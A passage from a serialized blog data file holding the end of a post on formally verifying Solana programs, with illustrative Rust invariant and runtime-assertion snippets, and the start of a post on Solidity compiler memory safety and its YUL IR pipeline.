"line":614},[27770],{"type":28,"tag":116,"props":27771,"children":27772},{"style":266},[27773],{"type":33,"value":20433},{"type":28,"tag":116,"props":27775,"children":27776},{"class":245,"line":631},[27777,27782,27786],{"type":28,"tag":116,"props":27778,"children":27779},{"style":266},[27780],{"type":33,"value":27781},"#[invariant(bad ",{"type":28,"tag":116,"props":27783,"children":27784},{"style":370},[27785],{"type":33,"value":2340},{"type":28,"tag":116,"props":27787,"children":27788},{"style":266},[27789],{"type":33,"value":27790}," false)]\n",{"type":28,"tag":116,"props":27792,"children":27793},{"class":245,"line":665},[27794,27798,27803],{"type":28,"tag":116,"props":27795,"children":27796},{"style":376},[27797],{"type":33,"value":9069},{"type":28,"tag":116,"props":27799,"children":27800},{"style":339},[27801],{"type":33,"value":27802}," Acc",{"type":28,"tag":116,"props":27804,"children":27805},{"style":266},[27806],{"type":33,"value":1291},{"type":28,"tag":116,"props":27808,"children":27809},{"class":245,"line":713},[27810,27814,27819,27823],{"type":28,"tag":116,"props":27811,"children":27812},{"style":376},[27813],{"type":33,"value":20506},{"type":28,"tag":116,"props":27815,"children":27816},{"style":272},[27817],{"type":33,"value":27818}," bad",{"type":28,"tag":116,"props":27820,"children":27821},{"style":370},[27822],{"type":33,"value":4160},{"type":28,"tag":116,"props":27824,"children":27825},{"style":339},[27826],{"type":33,"value":27827}," bool\n",{"type":28,"tag":116,"props":27829,"children":27830},{"class":245,"line":750},[27831],{"type":28,"tag":116,"props":27832,"children":27833},{"style":266},[27834],{"type":33,"value":406},{"type":28,"tag":116,"props":27836,"children":27837},{"class":245,"line":779},[27838],{"type":28,"tag":116,"props":27839,"children":27840},{"emptyLinePlaceholder":19},[27841],{"type":33,"value":1044},{"type":28,"tag":116,"props":27843,"children":27844},{"class":245,"line":796},[27845,27850,27854],{"type":28,"tag":116,"props":27846,"children":27847},{"style":376},[27848],{"type":33,"value":27849},"impl",{"type":28,"tag":116,"props":27851,"children":27852},{"style":339},[27853],{"type":33,"value":27802},{"type":28,"tag":116,"props":27855,"children":27856},{"style":266},[27857],{"type":33,"value":1291},{"type":28,"tag":116,"props":27859,"children":27860},{"class":245,"line":847},[27861,27865,27869,27874],{"type":28,"tag":116,"props":27862,"children":27863},{"style":376},[27864],{"type":33,"value":20506},{"type":28,"tag":116,"props":27866,"children":27867},{"style":376},[27868],{"type":33,"value":13361},{"type":28,"tag":116,"props":27870,"children":27871},{"style":282},[27872],{"type":33,"value":27873}," put_into_bad_state",{"type":28,"tag":116,"props":27875,"children":27876},{"style":266},[27877],{"type":33,"value":1068},{"type":28,"tag":116,"props":27879,"children":27880},{"class":245,"line":898},[27881,27885,27889,27894,27898,27902],{"type":28,"tag":116,"props":27882,"children":27883},{"style":376},[27884],{"type":33,"value":27015},{"type":28,"tag":116,"props":27886,"children":27887},{"style":370},[27888],{"type":33,"value":141},{"type":28,"tag":116,"props":27890,"children":27891},{"style":266},[27892],{"type":33,"value":27893},"bad ",{"type":28,"tag":116,"props":27895,"children":27896},{"style":370},[27897],{"type":33,"value":373},{"type":28,"tag":116,"props":27899,"children":27900},{"style":376},[27901],{"type":33,"value":1129},{"type":28,"tag":116,"props":27903,"children":27904},{"style":266},[27905],{"type":33,"value":384},{"type":28,"tag":116,"props":27907,"children":27908},{"class":245,"line":907},[27909],{"type":28,"tag":116,"props":27910,"children":27911},{"style":266},[27912],{"type":33,"value":3025},{"type":28,"tag":116,"props":27914,"children":27915},{"class":245,"line":981},[27916],{"type":28,"tag":116,"props":27917,"children":27918},{"style":266},[27919],{"type":33,"value":406},{"type":28,"tag":116,"props":27921,"children":27922},{"class":245,"line":1011},[27923],{"type":28,"tag":116,"props":27924,"children":27925},{"emptyLinePlaceholder":19},[27926],{"type":33,"value":1044},{"type":28,"tag":116,"props":27928,"children":27929},{"class":245,"line":1029},[27930],{"type":28,"tag":116,"props":27931,"children":27932},{"style":250},[27933],{"type":33,"value":27934},"// Instruction handler:\n",{"type":28,"tag":116,"props":27936,"children":27937},{"class":245,"line":1038},[27938,27942,27947,27951,27955,27959,27963,27967,27972,27976,27980,27984],{"type":28,"tag":116,"props":27939,"children":27940},{"style":376},[27941],{"type":33,"value":19930},{"type":28,"tag":116,"props":27943,"children":27944},{"style":282},[27945],{"type":33,"value":27946}," hard_to_verify",{"type":28,"tag":116,"props":27948,"children":27949},{"style":266},[27950],{"type":33,"value":313},{"type":28,"tag":116,"props":27952,"children":27953},{"style":272},[27954],{"type":33,"value":19944},{"type":28,"tag":116,"props":27956,"children":27957},{"style":370},[27958],{"type":33,"value":4160},{"type":28,"tag":116,"props":27960,"children":27961},{"style":339},[27962],{"type":33,"value":19953},{"type":28,"tag":116,"props":27964,"children":27965},{"style":266},[27966],{"type":33,"value":514},{"type":28,"tag":116,"props":27968,"children":27969},{"style":339},[27970],{"type":33,"value":27971},"MyCtx",{"type":28,"tag":116,"props":27973,"children":27974},{"style":266},[27975],{"type":33,"value":20110},{"type":28,"tag":116,"props":27977,"children":27978},{"style":370},[27979],{"type":33,"value":13423},{"type":28,"tag":116,"props":27981,"children":27982},{"style":339},[27983],{"type":33,"value":13428},{"type":28,"tag":116,"props":27985,"children":27986},{"style":266},[27987],{"type":33,"value":19995},{"type":28,"tag":116,"props":27989,"children":27990},{"class":245,"line":1047},[27991,27996,28000,28004,28009],{"type":28,"tag":116,"props":27992,"children":27993},{"style":282},[27994],{"type":33,"value":27995},"    invoke_signed",{"type":28,"tag":116,"props":27997,"children":27998},{"style":266},[27999],{"type":33,"value":313},{"type":28,"tag":116,"props":28001,"children":28002},{"style":370},[28003],{"type":33,"value":9259},{"type":28,"tag":116,"props":28005,"children":28006},{"style":266},[28007],{"type":33,"value":28008},"); ",{"type":28,"tag":116,"props":28010,"children":28011},{"style":250},[28012],{"type":33,"value":28013},"// Cross-program invocation\n",{"type":28,"tag":116,"props":28015,"children":28016},{"class":245,"line":1071},[28017],{"type":28,"tag":116,"props":28018,"children":28019},{"emptyLinePlaceholder":19},[28020],{"type":33,"value":1044},{"type":28,"tag":116,"props":28022,"children":28023},{"class":245,"line":1137},[28024,28028,28033,28037,28041,28045],{"type":28,"tag":116,"props":28025,"children":28026},{"style":376},[28027],{"type":33,"value":2672},{"type":28,"tag":116,"props":28029,"children":28030},{"style":272},[28031],{"type":33,"value":28032}," invoke_res",{"type":28,"tag":116,"props":28034,"children":28035},{"style":370},[28036],{"type":33,"value":2226},{"type":28,"tag":116,"props":28038,"children":28039},{"style":370},[28040],{"type":33,"value":24954},{"type":28,"tag":116,"props":28042,"children":28043},{"style":266},[28044],{"type":33,"value":16888},{"type":28,"tag":116,"props":28046,"children":28047},{"style":250},[28048],{"type":33,"value":28049},"// fetch result of invocation\n",{"type":28,"tag":116,"props":28051,"children":28052},{"class":245,"line":1181},[28053,28057,28061,28065,28070],{"type":28,"tag":116,"props":28054,"children":28055},{"style":260},[28056],{"type":33,"value":11947},{"type":28,"tag":116,"props":28058,"children":28059},{"style":272},[28060],{"type":33,"value":28032},{"type":28,"tag":116,"props":28062,"children":28063},{"style":370},[28064],{"type":33,"value":2953},{"type":28,"tag":116,"props":28066,"children":28067},{"style":350},[28068],{"type":33,"value":28069}," 5",{"type":28,"tag":116,"props":28071,"children":28072},{"style":266},[28073],{"type":33,"value":1291},{"type":28,"tag":116,"props":28075,"children":28076},{"class":245,"line":1212},[28077,28081,28085,28090,28094,28099,28104],{"type":28,"tag":116,"props":28078,"children":28079},{"style":272},[28080],{"type":33,"value":25841},{"type":28,"tag":116,"props":28082,"children":28083},{"style":370},[28084],{"type":33,"value":141},{"type":28,"tag":116,"props":28086,"children":28087},{"style":266},[28088],{"type":33,"value":28089},"my_account",{"type":28,"tag":116,"props":28091,"children":28092},{"style":370},[28093],{"type":33,"value":141},{"type":28,"tag":116,"props":28095,"children":28096},{"style":282},[28097],{"type":33,"value":28098},"put_into_bad_state",{"type":28,"tag":116,"props":28100,"children":28101},{"style":266},[28102],{"type":33,"value":28103},"(); ",{"type":28,"tag":116,"props":28105,"children":28106},{"style":250},[28107],{"type":33,"value":28108},"// corrupt our account\n",{"type":28,"tag":116,"props":28110,"children":28111},{"class":245,"line":1254},[28112],{"type":28,"tag":116,"props":28113,"children":28114},{"style":266},[28115],{"type":33,"value":3025},{"type":28,"tag":116,"props":28117,"children":28118},{"class":245,"line":1262},[28119,28123],{"type":28,"tag":116,"props":28120,"children":28121},{"style":339},[28122],{"type":33,"value":13999},{"type":28,"tag":116,"props":28124,"children":28125},{"style":266},[28126],{"type":33,"value":14004},{"type":28,"tag":116,"props":28128,"children":28129},{"class":245,"line":1294},[28130],{"type":28,"tag":116,"props":28131,"children":28132},{"style":266},[28133],{"type":33,"value":406},{"type":28,"tag":29,"props":28135,"children":28136},{},[28137,28139,28144],{"type":33,"value":28138},"The integrity of the verification framework relies on the fact that the account invariants for the accounts contained in the instruction (in this case ",{"type":28,"tag":98,"props":28140,"children":28142},{"className":28141},[],[28143],{"type":33,"value":28089},{"type":33,"value":28145},") will be maintained as long as the instruction succeeds.",{"type":28,"tag":29,"props":28147,"children":28148},{},[28149],{"type":33,"value":28150},"In this case, we can't really verify if the instruction succeeds or not (at least without knowing which program/instruction will be invoked).",{"type":28,"tag":29,"props":28152,"children":28153},{},[28154,28156,28161],{"type":33,"value":28155},"However, we can ",{"type":28,"tag":2583,"props":28157,"children":28158},{},[28159],{"type":33,"value":28160},"augment",{"type":33,"value":28162}," our code with additional runtime constraints to ensure that the safety properties are preserved even if formal verification fails.",{"type":28,"tag":29,"props":28164,"children":28165},{},[28166],{"type":33,"value":28167},"In this case, we can add runtime assertions that ensure our runtime invariants hold. For example:",{"type":28,"tag":234,"props":28169,"children":28171},{"code":28170,"language":2651,"meta":7,"className":2652,"style":7},"...\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n    invoke_signed(...); // Cross-program invocation\n\n    let invoke_res = ...; // fetch result of invocation\n    if invoke_res == 5 {\n        ctx.my_account.put_into_bad_state(); // corrupt our account\n    }\n\n    // Enforce invariants at runtime\n    assert(ctx.my_account.invariant());\n\n    Ok(())\n}\n",[28172],{"type":28,"tag":98,"props":28173,"children":28174},{"__ignoreMap":7},[28175,28183,28234,28257,28264,28291,28314,28345,28352,28359,28367,28402,28409,28420],{"type":28,"tag":116,"props":28176,"children":28177},{"class":245,"line":246},[28178],{"type":28,"tag":116,"props":28179,"children":28180},{"style":370},[28181],{"type":33,"value":28182},"...\n",{"type":28,"tag":116,"props":28184,"children":28185},{"class":245,"line":256},[28186,28190,28194,28198,28202,28206,28210,28214,28218,28222,28226,28230],{"type":28,"tag":116,"props":28187,"children":28188},{"style":376},[28189],{"type":33,"value":19930},{"type":28,"tag":116,"props":28191,"children":28192},{"style":282},[28193],{"type":33,"value":27946},{"type":28,"tag":116,"props":28195,"children":28196},{"style":266},[28197],{"type":33,"value":313},{"type":28,"tag":116,"props":28199,"children":28200},{"style":272},[28201],{"type":33,"value":19944},{"type":28,"tag":116,"props":28203,"children":28204},{"style":370},[28205],{"type":33,"value":4160},{"type":28,"tag":116,"props":28207,"children":28208},{"style":339},[28209],{"type":33,"value":19953},{"type":28,"tag":116,"props":28211,"children":28212},{"style":266},[28213],{"type":33,"value":514},{"type":28,"tag":116,"props":28215,"children":28216},{"style":339},[28217],{"type":33,"value":27971},{"type":28,"tag":116,"props":28219,"children":28220},{"style":266},[28221],{"type":33,"value":20110},{"type":28,"tag":116,"props":28223,"children":28224},{"style":370},[28225],{"type":33,"value":13423},{"type":28,"tag":116,"props":28227,"children":28228},{"style":339},[28229],{"type":33,"value":13428},{"type":28,"tag":116,"props":28231,"children":28232},{"style":266},[28233],{"type":33,"value":19995},{"type":28,"tag":116,"props":28235,"children":28236},{"class":245,"line":293},[28237,28241,28245,28249,28253],{"type":28,"tag":116,"props":28238,"children":28239},{"style":282},[28240],{"type":33,"value":27995},{"type":28,"tag":116,"props":28242,"children":28243},{"style":266},[28244],{"type":33,"value":313},{"type":28,"tag":116,"props":28246,"children":28247},{"style":370},[28248],{"type":33,"value":9259},{"type":28,"tag":116,"props":28250,"children":28251},{"style":266},[28252],{"type":33,"value":28008},{"type":28,"tag":116,"props":28254,"children":28255},{"style":250},[28256],{"type":33,"value":28013},{"type":28,"tag":116,"props":28258,"children":28259},{"class":245,"line":361},[28260],{"type":28,"tag":116,"props":28261,"children":28262},{"emptyLinePlaceholder":19},[28263],{"type":33,"value":1044},{"type":28,"tag":116,"props":28265,"children":28266},{"class":245,"line":387},[28267,28271,28275,28279,28283,28287],{"type":28,"tag":116,"props":28268,"children":28269},{"style":376},[28270],{"type":33,"value":2672},{"type":28,"tag":116,"props":28272,"children":28273},{"style":272},[28274],{"type":33,"value":28032},{"type":28,"tag":116,"props":28276,"children":28277},{"style":370},[28278],{"type":33,"value":2226},{"type":28,"tag":116,"props":28280,"children":28281},{"style":370},[28282],{"type":33,"value":24954},{"type":28,"tag":116,"props":28284,"children":28285},{"style":266},[28286],{"type":33,"value":16888},{"type":28,"tag":116,"props":28288,"children":28289},{"style":250},[28290],{"type":33,"value":28049},{"type":28,"tag":116,"props":28292,"children":28293},{"class":245,"line":400},[28294,28298,28302,28306,28310],{"type":28,"tag":116,"props":28295,"children":28296},{"style":260},[28297],{"type":33,"value":11947},{"type":28,"tag":116,"props":28299,"children":28300},{"style":272},[28301],{"type":33,"value":28032},{"type":28,"tag":116,"props":28303,"children":28304},{"style":370},[28305],{"type":33,"value":2953},{"type":28,"tag":116,"props":28307,"children":28308},{"style":350},[28309],{"type":33,"value":28069},{"type":28,"tag":116,"props":28311,"children":28312},{"style":266},[28313],{"type":33,"value":1291},{"type":28,"tag":116,"props":28315,"children":28316},{"class":245,"line":614},[28317,28321,28325,28329,28333,28337,28341],{"type":28,"tag":116,"props":28318,"children":28319},{"style":272},[28320],{"type":33,"value":25841},{"type":28,"tag":116,"props":28322,"children":28323},{"style":370},[28324],{"type":33,"value":141},{"type":28,"tag":116,"props":28326,"children":28327},{"style":266},[28328],{"type":33,"value":28089},{"type":28,"tag":116,"props":28330,"children":28331},{"style":370},[28332],{"type":33,"value":141},{"type":28,"tag":116,"props":28334,"children":28335},{"style":282},[28336],{"type":33,"value":28098},{"type":28,"tag":116,"props":28338,"children":28339},{"style":266},[28340],{"type":33,"value":28103},{"type":28,"tag":116,"props":28342,"children":28343},{"style":250},[28344],{"type":33,"value":28108},{"type":28,"tag":116,"props":28346,"children":28347},{"class":245,"line":631},[28348],{"type":28,"tag":116,"props":28349,"children":28350},{"style":266},[28351],{"type":33,"value":3025},{"type":28,"tag":116,"props":28353,"children":28354},{"class":245,"line":665},[28355],{"type":28,"tag":116,"props":28356,"children":28357},{"emptyLinePlaceholder":19},[28358],{"type":33,"value":1044},{"type":28,"tag":116,"props":28360,"children":28361},{"class":245,"line":713},[28362],{"type":28,"tag":116,"props":28363,"children":28364},{"style":250},[28365],{"type":33,"value":28366},"    // Enforce invariants at runtime\n",{"type":28,"tag":116,"props":28368,"children":28369},{"class":245,"line":750},[28370,28374,28378,28382,28386,28390,28394,28398],{"type":28,"tag":116,"props":28371,"children":28372},{"style":282},[28373],{"type":33,"value":18903},{"type":28,"tag":116,"props":28375,"children":28376},{"style":266},[28377],{"type":33,"value":313},{"type":28,"tag":116,"props":28379,"children":28380},{"style":272},[28381],{"type":33,"value":19944},{"type":28,"tag":116,"props":28383,"children":28384},{"style":370},[28385],{"type":33,"value":141},{"type":28,"tag":116,"props":28387,"children":28388},{"style":266},[28389],{"type":33,"value":28089},{"type":28,"tag":116,"props":28391,"children":28392},{"style":370},[28393],{"type":33,"value":141},{"type":28,"tag":116,"props":28395,"children":28396},{"style":282},[28397],{"type":33,"value":21440},{"type":28,"tag":116,"props":28399,"children":28400},{"style":266},[28401],{"type":33,"value":1577},{"type":28,"tag":116,"props":28403,"children":28404},{"class":245,"line":779},[28405],{"type":28,"tag":116,"props":28406,"children":28407},{"emptyLinePlaceholder":19},[28408],{"type":33,"value":1044},{"type":28,"tag":116,"props":28410,"children":28411},{"class":245,"line":796},[28412,28416],{"type":28,"tag":116,"props":28413,"children":28414},{"style":339},[28415],{"type":33,"value":13999},{"type":28,"tag":116,"props":28417,"children":28418},{"style":266},[28419],{"type":33,"value":14004},{"type":28,"tag":116,"props":28421,"children":28422},{"class":245,"line":847},[28423],{"type":28,"tag":116,"props":28424,"children":28425},{"style":266},[28426],{"type":33,"value":406},{"type":28,"tag":29,"props":28428,"children":28429},{},[28430,28432,28437,28439,28444,28446,28451],{"type":33,"value":28431},"Here, we explicitly ",{"type":28,"tag":98,"props":28433,"children":28435},{"className":28434},[],[28436],{"type":33,"value":19648},{"type":33,"value":28438}," that our invariants hold at ",{"type":28,"tag":2583,"props":28440,"children":28441},{},[28442],{"type":33,"value":28443},"runtime",{"type":33,"value":28445}," which allows us to be assured that ",{"type":28,"tag":98,"props":28447,"children":28449},{"className":28448},[],[28450],{"type":33,"value":28089},{"type":33,"value":28452}," will not enter a bad state as a result of some unverifiable behavior.",{"type":28,"tag":29,"props":28454,"children":28455},{},[28456],{"type":33,"value":28457},"In general techniques like this can be used to tidy up the loose ends that formal verification may struggle with.",{"type":28,"tag":63,"props":28459,"children":28461},{"id":28460},"challenges-of-formal-verification-on-solana",[28462],{"type":33,"value":28463},"Challenges of formal verification on Solana",{"type":28,"tag":75,"props":28465,"children":28467},{"id":28466},"expensive-computation",[28468],{"type":33,"value":28469},"Expensive computation",{"type":28,"tag":29,"props":28471,"children":28472},{},[28473,28475,28480],{"type":33,"value":28474},"As we started exploring this project, we were hoping to see it work straight out of the box. Unfortunately, that was not the case. Harkening back to our friend ",{"type":28,"tag":2583,"props":28476,"children":28477},{},[28478],{"type":33,"value":28479},"path explosion",{"type":33,"value":28481},", it is often the case that bounded model checking just grinds and grinds on the problem and is not able to produce a solution.",{"type":28,"tag":29,"props":28483,"children":28484},{},[28485,28487,28492],{"type":33,"value":28486},"In order to make this technique more widely applicable, we've been developing a runtime SDK layer that is more ",{"type":28,"tag":2583,"props":28488,"children":28489},{},[28490],{"type":33,"value":28491},"formal verification friendly",{"type":33,"value":28493},". Specifically our tool will replace certain built-in SDK functions and structures with less expensive ones in the context of symbolic execution.",{"type":28,"tag":29,"props":28495,"children":28496},{},[28497,28499,28504,28506,28511],{"type":33,"value":28498},"For example, when verifying things like the uniqueness of a ",{"type":28,"tag":98,"props":28500,"children":28502},{"className":28501},[],[28503],{"type":33,"value":21061},{"type":33,"value":28505}," in a ",{"type":28,"tag":98,"props":28507,"children":28509},{"className":28508},[],[28510],{"type":33,"value":16872},{"type":33,"value":28512},", the native program may generate extremely large SMT expressions containing nested 32-byte comparisons and binary searches on a vector.",{"type":28,"tag":29,"props":28514,"children":28515},{},[28516,28518,28523,28525,28530,28532,28537,28539,28544,28546,28551,28553,28558],{"type":33,"value":28517},"However, in most cases the properties we are interested in do not require specific search algorithms for the ",{"type":28,"tag":98,"props":28519,"children":28521},{"className":28520},[],[28522],{"type":33,"value":16872},{"type":33,"value":28524}," or a 32-byte ",{"type":28,"tag":98,"props":28526,"children":28528},{"className":28527},[],[28529],{"type":33,"value":21061},{"type":33,"value":28531},". Instead, our tool can substitute in ",{"type":28,"tag":2583,"props":28533,"children":28534},{},[28535],{"type":33,"value":28536},"cheaper",{"type":33,"value":28538}," types and functions, such as a 4-byte ",{"type":28,"tag":98,"props":28540,"children":28542},{"className":28541},[],[28543],{"type":33,"value":21061},{"type":33,"value":28545}," struct and a fixed-size, array-backed ",{"type":28,"tag":98,"props":28547,"children":28549},{"className":28548},[],[28550],{"type":33,"value":16872},{"type":33,"value":28552}," implementation. These structures are API-compatible with the native SDK and the changes are functionally invisible to the Solana program we are verifying. However, the generated expressions are ",{"type":28,"tag":2583,"props":28554,"children":28555},{},[28556],{"type":33,"value":28557},"much",{"type":33,"value":28559}," simpler and we find that these techniques can greatly accelerate the speed of model-checking.",{"type":28,"tag":29,"props":28561,"children":28562},{},[28563],{"type":33,"value":28564},"It is of key importance that these SDK modifications do not introduce any unsoundness into the model-checking process. We are actively exploring how to do this effectively.",{"type":28,"tag":75,"props":28566,"children":28568},{"id":28567},"runtime-environment",[28569],{"type":33,"value":28570},"Runtime Environment",{"type":28,"tag":29,"props":28572,"children":28573},{},[28574],{"type":33,"value":28575},"While these techniques are quite capable of verifying pure-Rust constructs such as the logical flow of the program, use of Rust types, etc... other aspects of the Solana runtime environment are more difficult to verify.",{"type":28,"tag":29,"props":28577,"children":28578},{},[28579],{"type":33,"value":28580},"For example, a program may resize accounts to store variable amounts of data. These types of custom serialization algorithms require specialized techniques to verify account invariants. For example, a bug with account serialization could undermine \"correct\" account logic.",{"type":28,"tag":29,"props":28582,"children":28583},{},[28584],{"type":33,"value":28585},"Another example is cross-program invocation (CPI). While account data cannot be changed by other programs, when you invoke other instructions it becomes more difficult to verify instruction invariants. An instruction three levels down could fail and cause the whole transaction to revert.",{"type":28,"tag":63,"props":28587,"children":28588},{"id":2506},[28589],{"type":33,"value":2509},{"type":28,"tag":29,"props":28591,"children":28592},{},[28593],{"type":33,"value":28594},"Computer security is far from being a solved problem. Formal verification is a great technique but it is not a magic bullet. While it can help you verify the correctness of your program it won't catch 100% of the bugs. It won't stop you from specifying the wrong invariants or forgetting things, and it can't help you if there is a bug outside of the scope of the model — for example in the runtime or consensus layer.",{"type":28,"tag":29,"props":28596,"children":28597},{},[28598],{"type":33,"value":28599},"Disclaimer out of the way, we believe that formal verification can still be a very useful tool when applied correctly. We've demonstrated that it is possible to automatically prove invariants about Solana programs in a tractable and user-friendly way.",{"type":28,"tag":18457,"props":28601,"children":28602},{},[],{"type":28,"tag":29,"props":28604,"children":28605},{},[28606],{"type":28,"tag":2583,"props":28607,"children":28608},{},[28609,28611,28616,28617,28621],{"type":33,"value":28610},"We're excited to keep pushing this research forward and enhance the security of the whole Solana ecosystem. Our tools are still in development but we're interested in working with other teams. If you have a Solana program you want to get formally verified, give us a shout! Fill out ",{"type":28,"tag":87,"props":28612,"children":28614},{"href":18540,"rel":28613},[91],[28615],{"type":33,"value":18544},{"type":33,"value":18546},{"type":28,"tag":87,"props":28618,"children":28619},{"href":18549},[28620],{"type":33,"value":18552},{"type":33,"value":141},{"type":28,"tag":2516,"props":28623,"children":28624},{},[28625],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":28627},[28628,28634,28638,28643,28649,28653],{"id":18613,"depth":256,"text":18616,"children":28629},[28630,28631,28632,28633],{"id":18619,"depth":293,"text":18622},{"id":18687,"depth":293,"text":18690},{"id":19568,"depth":293,"text":19571},{"id":19608,"depth":293,"text":19611},{"id":19661,"depth":256,"text":28635,"children":28636},"Specification: How can we describe what we want our program to do?",[28637],{"id":19774,"depth":293,"text":19777},{"id":21133,"depth":256,"text":21136,"children":28639},[28640,28641,28642],{"id":21809,"depth":293,"text":21812},{"id":22094,"depth":293,"text":22097},{"id":22238,"depth":293,"text":22241},{"id":22379,"depth":256,"text":22382,"children":28644},[28645,28646,28647,28648],{"id":22450,"depth":293,"text":22453},{"id":24293,"depth":293,"text":24296},{"id":25095,"depth":293,"text":22442},{"id":27620,"depth":293,"text":22447},{"id":28460,"depth":256,"text":28463,"children":28650},[28651,28652],{"id":28466,"depth":293,"text":28469},{"id":28567,"depth":293,"text":28570},{"id":2506,"depth":256,"text":2509},"content:blog:2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs",{"_path":28658,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":28659,"description":28660,"author":5391,"image":28661,"date":28663,"isFeatured":19,"onBlogPage":19,"tags":28664,"body":28666,"_type":2534,"_id":30085,"_source":2536,"_file":30086,"_stem":30087,"_extension":2539},"/blog/2023-07-28-solidity-compilers-memory-safety","Solidity Compilers: Memory Safety","An exploration into the Solidity compilation pipeline, optimization assumptions, and how it all relates back to memory-safe assembly.",{"src":28662,"height":18,"width":18},"/posts/solidity-compilers-memory-safety/header.jpg","2023-07-28",[4142,28665],"compiler",{"type":25,"children":28667,"toc":30076},[28668,28674,28710,28722,28728,28750,28763,28911,28932,28937,28958,28963,28971,28976,28981,28986,28992,29011,29016,29037,29100,29113,29143,29163,29190,29195,29208,29213,29218,29231,29262,29285,29439,29457,29508,29527,29552,29557,29563,29590,29610,29638,29643,29665,29684,29692,29703,29708,29724,29980,29988,29993,29997,30002,30007,30072],{"type":28,"tag":63,"props":28669,"children":28671},{"id":28670},"introduction",[28672],{"type":33,"value":28673},"Introduction",{"type":28,"tag":29,"props":28675,"children":28676},{},[28677,28679,28685,28686,28690,28692,28699,28701,28708],{"type":33,"value":28678},"What does ",{"type":28,"tag":98,"props":28680,"children":28682},{"className":28681},[],[28683],{"type":33,"value":28684},"memory-safe",{"type":33,"value":6129},{"type":28,"tag":2583,"props":28687,"children":28688},{},[28689],{"type":33,"value":8956},{"type":33,"value":28691}," mean? What guarantees does Solidity expose when you're dealing with inline assembly? The documentation ",{"type":28,"tag":87,"props":28693,"children":28696},{"href":28694,"rel":28695},"https://docs.soliditylang.org/en/v0.8.20/assembly.html#memory-safety",[91],[28697],{"type":33,"value":28698},"presents some requirements",{"type":33,"value":28700},", but is production code that ",{"type":28,"tag":87,"props":28702,"children":28705},{"href":28703,"rel":28704},"https://github.com/Vectorized/solady/blob/main/src/utils/SafeTransferLib.sol#L165-L166",[91],[28706],{"type":33,"value":28707},"violates these requirements",{"type":33,"value":28709}," necessarily unsafe?",{"type":28,"tag":29,"props":28711,"children":28712},{},[28713,28715,28720],{"type":33,"value":28714},"In this blog post, we present a high-level overview of the Solidity compiler. We'll also dive into the optimization pipeline, language lawyering, and present an argument for what ",{"type":28,"tag":2583,"props":28716,"children":28717},{},[28718],{"type":33,"value":28719},"memory-safety",{"type":33,"value":28721}," actually means.",{"type":28,"tag":63,"props":28723,"children":28725},{"id":28724},"compiler-pipeline",[28726],{"type":33,"value":28727},"Compiler Pipeline",{"type":28,"tag":29,"props":28729,"children":28730},{},[28731,28733,28740,28742,28749],{"type":33,"value":28732},"For brevity's sake, we'll only cover the YUL IR Solidity compilation pipeline ",{"type":28,"tag":87,"props":28734,"children":28737},{"href":28735,"rel":28736},"https://blog.soliditylang.org/2022/03/16/solidity-0.8.13-release-announcement/",[91],[28738],{"type":33,"value":28739},"released in v0.8.13",{"type":33,"value":28741},". Compilation happens ",{"type":28,"tag":87,"props":28743,"children":28746},{"href":28744,"rel":28745},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libsolidity/interface/CompilerStack.cpp#L684",[91],[28747],{"type":33,"value":28748},"in two main steps",{"type":33,"value":4160},{"type":28,"tag":455,"props":28751,"children":28752},{},[28753,28758],{"type":28,"tag":459,"props":28754,"children":28755},{},[28756],{"type":33,"value":28757},"Solidity to YUL IR",{"type":28,"tag":459,"props":28759,"children":28760},{},[28761],{"type":33,"value":28762},"YUL IR to EVM opcodes",{"type":28,"tag":234,"props":28764,"children":28768},{"className":28765,"code":28766,"language":28767,"meta":7,"style":7},"language-cpp shiki shiki-themes slack-dark","    if (m_viaIR || m_generateIR || m_generateEwasm)\n        generateIR(*contract);\n    if (m_generateEvmBytecode)\n    {\n        if (m_viaIR)\n            generateEVMFromIR(*contract);\n        else\n            compileContract(*contract, otherCompilers);\n    }\n","cpp",[28769],{"type":28,"tag":98,"props":28770,"children":28771},{"__ignoreMap":7},[28772,28802,28823,28835,28843,28855,28875,28883,28904],{"type":28,"tag":116,"props":28773,"children":28774},{"class":245,"line":246},[28775,28779,28784,28788,28793,28797],{"type":28,"tag":116,"props":28776,"children":28777},{"style":260},[28778],{"type":33,"value":11947},{"type":28,"tag":116,"props":28780,"children":28781},{"style":266},[28782],{"type":33,"value":28783}," (m_viaIR ",{"type":28,"tag":116,"props":28785,"children":28786},{"style":370},[28787],{"type":33,"value":22081},{"type":28,"tag":116,"props":28789,"children":28790},{"style":266},[28791],{"type":33,"value":28792}," m_generateIR ",{"type":28,"tag":116,"props":28794,"children":28795},{"style":370},[28796],{"type":33,"value":22081},{"type":28,"tag":116,"props":28798,"children":28799},{"style":266},[28800],{"type":33,"value":28801}," m_generateEwasm)\n",{"type":28,"tag":116,"props":28803,"children":28804},{"class":245,"line":256},[28805,28810,28814,28818],{"type":28,"tag":116,"props":28806,"children":28807},{"style":282},[28808],{"type":33,"value":28809},"        generateIR",{"type":28,"tag":116,"props":28811,"children":28812},{"style":266},[28813],{"type":33,"value":313},{"type":28,"tag":116,"props":28815,"children":28816},{"style":370},[28817],{"type":33,"value":4240},{"type":28,"tag":116,"props":28819,"children":28820},{"style":266},[28821],{"type":33,"value":28822},"contract);\n",{"type":28,"tag":116,"props":28824,"children":28825},{"class":245,"line":293},[28826,28830],{"type":28,"tag":116,"props":28827,"children":28828},{"style":260},[28829],{"type":33,"value":11947},{"type":28,"tag":116,"props":28831,"children":28832},{"style":266},[28833],{"type":33,"value":28834}," (m_generateEvmBytecode)\n",{"type":28,"tag":116,"props":28836,"children":28837},{"class":245,"line":361},[28838],{"type":28,"tag":116,"props":28839,"children":28840},{"style":266},[28841],{"type":33,"value":28842},"    {\n",{"type":28,"tag":116,"props":28844,"children":28845},{"class":245,"line":387},[28846,28850],{"type":28,"tag":116,"props":28847,"children":28848},{"style":260},[28849],{"type":33,"value":2943},{"type":28,"tag":116,"props":28851,"children":28852},{"style":266},[28853],{"type":33,"value":28854}," (m_viaIR)\n",{"type":28,"tag":116,"props":28856,"children":28857},{"class":245,"line":400},[28858,28863,28867,28871],{"type":28,"tag":116,"props":28859,"children":28860},{"style":282},[28861],{"type":33,"value":28862},"            